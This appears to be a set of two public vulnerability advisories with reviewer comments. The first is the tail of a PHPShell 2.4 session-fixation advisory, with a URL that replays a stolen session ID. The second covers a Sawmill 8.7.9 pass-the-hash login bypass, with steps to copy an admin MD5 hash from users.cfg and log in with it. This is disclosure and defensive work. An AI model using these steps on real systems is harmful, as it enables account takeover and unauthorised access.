http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID=<STOLEN-SESSION-ID>
You should see what the authenticated victim now sees...
e.g.
Current Working Directory:
Change to subdirectory:
07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll
11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll
07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll
11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll
11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll
11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll
11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll
11/20/2010 10:24 PM 327,168
Microsoft.MediaCenter.TV.Tuners.Interop.dll
11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll
10/29/2011 12:23 AM 465,920 mstvcapn.dll
11/20/2010 10:24 PM 88,576 NetBridge.dll
07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe
06/10/2009 04:04 PM 129,528 segmcr.ttf
etc...
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: No reply
Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404
http://sourceforge.net/tracker/?group_id=156638
February 18, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX -
ApparitionSec
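Review bot: the statement in Security Issue that `session.use_only_cookies=1` "is default since PHP 4.3.0" is off: the directive was added in 4.3.0, but the PHP manual records the default changing to 1 in PHP 5.3.0. Since the whole exploitability condition rests on that setting, the version should be right. The fix follows directly from the text and is worth stating for the vendor: call `session_regenerate_id(true)` after successful authentication, after the `session_start()` on line 153 of phpshell.php, and keep `session.use_only_cookies=1`. Spelling: "directorys" should be "directories", "victims" should be "victim's" (twice), "finds way" should be "finds a way", "run system command" should be "run a system command". The files.csv row dates this entry 2017-02-19 while the Disclosure Timeline says February 18, 2017.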


@ -0,0 +1,138 @@
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.sawmill.net
Product:
========================
Sawmill Enterprise v8.7.9
sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0
Sawmill is a powerful heirarchical log analysis tool that runs on every
major platform.
Vulnerability Type:
===================================
Pass the Hash Authentication Bypass
CVE Reference:
==============
CVE-2017-5496
Security Issue:
=====================
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
attacker who gains access to the hashed user account passwords
can login to the Sawmill interface using the raw MD5 hash values, allowing
attackers to bypass the work of offline cracking
account password hashes.
This issue usually is known to affect Windows systems e.g. (NT Pass the
Hash/Securityfocus, 1997). However, this vulnerability can also
present itself in a vulnerable Web application.
Sawmill account password hashes are stored under LogAnalysisInfo/ directory
in "users.cfg".
e.g.
users = {
root_admin = {
username = "admin"
password_checksum = "e99a18c428cb38d5f260853678922e03"
email_address = ""
This config file is stored local to the Sawmill application. However, if an
attacker gains access to a backup of the config that is
stored in some other location that is then compromised, it can lead to
subversion of Sawmills authenticaton process.
Moreover, since 'users.cfg' file is world readble a regular non Admin
Windows user who logs into the system running sawmill can now grab
a password hash and easily login to the vulnerable application without the
needing the password itself.
How to test?
Sawmill running (default port 8988), log off Windows and switch to a
"Standard" Windows non Administrator user.
1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.
Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
salt.
e.g.
password: abc123
MD5 hash:
e99a18c428cb38d5f260853678922e03
Disclosure Timeline:
=====================================
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned : January 20
Request status : January 26
Vendor: Fix avail later in year still no ETA
Inform vendor public disclose date
February 18, 2017 : Public Disclosure
Network Access:
===============
Remote
Impact:
======================
Information Disclosure
Privilege Escalation
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
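Review bot: the core point, that the stored `password_checksum` value is accepted in place of the password, is made, but the advisory never says in which request the hash was submitted (the ordinary login form's password field, or something else) or whether the login page hashes the password client-side before sending it; stating the observed request would let the vendor and readers judge whether the fix is a server-side salted hash alone or also a change to the login flow. The "Privilege Escalation" impact rests on `users.cfg` being world-readable, which is asserted but not shown; quoting the ACL observed on `C:\Program Files\Sawmill 8\LogAnalysisInfo\users.cfg` would support it. Spelling: "heirarchical" should be "hierarchical", "authenticaton" should be "authentication", "readble" should be "readable", "Sawmills" should be "Sawmill's" (twice), "your Admin" should be "you're Admin". The timeline lines "CVE-2017-5496 assigned : January 20" and "Request status : January 26" lack a year.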